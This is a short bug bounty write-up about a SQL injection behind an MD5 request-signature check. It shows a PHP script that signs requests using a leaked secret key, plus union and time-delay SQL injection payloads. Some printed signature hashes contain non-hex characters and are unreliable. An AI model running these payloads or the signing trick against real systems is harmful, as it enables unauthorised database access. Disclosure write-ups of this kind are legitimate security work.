[Bug Bounty Writeups] Exploiting SQL Injection Vulnerability
I’m going to share this concise writeup for a bug reported to one of bug bounty programs on hackerone
The bug was a very Straight Forward, but there was an obstacle that could prevent it from being discovered.
the problem was that you need to provide a valid signature for each request you submit.😲
let’s say the endpoint looks like this:
The backend server will first validates the request to see whether a valid signature is provided, then continues and processes the request.
so,
if we need to test that endpoint we first need to know how signatures are calculated,
for this purpose I took a look at the developers’ documentation. i was very lucky that i found the SecretKey used in the generation of MD5 signature leaked in these documentations. 🥳
How signatures are calculated:
signature = md5 ( params_value + SecretKey )
the signature is md5sum of all parameters value concatenated with the SecretKey,
let’s say the SecretKey was “AABBCCDDEEFFGG”
that means, if we need request like this:
vuln.php?param=1111"
then signature must be:
md5 ( 1111" + AABBCCDDEEFFGG)
= md5(1111"AABBCCDDEEFFGG)
= d2d0114df70a4485a8d836efa018b28d
final request looks like:
https://site.com/vuln.php?param=1111"&sig=d2d0114df70a4485a8d836efa018b28d
above request triggered SQL error 😎
🥺🥺🥺🥺🥺🥺🥺
i was asked by the team to dig deeper in exploiting this vulnerability and to provide a POC that result in a 10 seconds delay in the server response 🤐
for that purpose i’ve to try several queries, so i’ve written this very simple php script to save the time that would be spent in signature generation
<?php
$param = urlencode($argv[1]);
$SecretKey = “AABBCCDDEEFFGG”;
$req = “http://site.com/vuln.php?param=".$param."&sig=".md5($param.$SecretKey);
echo file_get_contents($req);
?>
by running the code from the termainal:
$ php exp.php 1"
http://site.com/vuln.php?param=1"&sig=5a8xd71839d8073218e5761025791d2c
gives → MySQL Error 🧐
$ php exp.php 1" ORDER BY 1 — +-
http://site.com/vuln.php?param=1+ORDER+BY+1--%2B-&sig=f8b8cb839d8j33218odi610sq2791d2c
.
.
.etc
.
$ php exp.php 1" UNION SELECT 1,SLEEP(10),3 — +-
http://site.com/vuln.php?param=1+UNION+SELECT+1%2CSLEEP%2810%29%2C3--%2B-&sig=32a097a82139a371bcb6839e0aa103e8
got a 10 seconds delay 😁.
😪😪😪😪
it was double qoute injection, Automated tools will not work in this case since they have no idea about that signature (you can code your own tamper script for sqlmap to automate it).
the bug was submitted to the program, it has CVSS of 10/10 and classified as Critical, the Program paid $2000 for this bug, it was the maximum payout the program could pay that time.
Cheers 🥂
./S3cr3tSDN
